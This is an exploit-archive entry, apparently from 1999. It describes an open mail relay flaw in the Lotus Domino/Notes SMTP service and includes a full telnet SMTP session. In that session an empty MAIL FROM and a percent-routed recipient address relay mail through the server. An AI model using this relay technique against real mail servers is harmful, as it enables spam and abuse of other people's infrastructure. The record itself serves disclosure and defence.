Lotus Domino 4.6.14.6.4 Notes - SMTPA MTA Mail Relay

1999-06-15T00:00:00
ID EXPLOITPACK:865E084F760CFEA982A7B0E2EFDB976D
Type exploitpack
Reporter Robert Lister
Modified 1999-06-15T00:00:00

Description

Lotus Domino 4.6.14.6.4 Notes - SMTPA MTA Mail Relay

                                        
                                            source: https://www.securityfocus.com/bid/487/info

Lotus Notes SMTP MTA is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data may allow an unauthorized user to relay email via this server. 

telnet server 25
Connected to 192.168.1.1.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO sample.domain
250 company.com
MAIL FROM:<>
250 OK
RCPT TO:<recipient%remote.domain.net@company.com>
250 OK
DATA
From: ... etc

text of message

.
250 Message received OK.
quit
221 GoodBye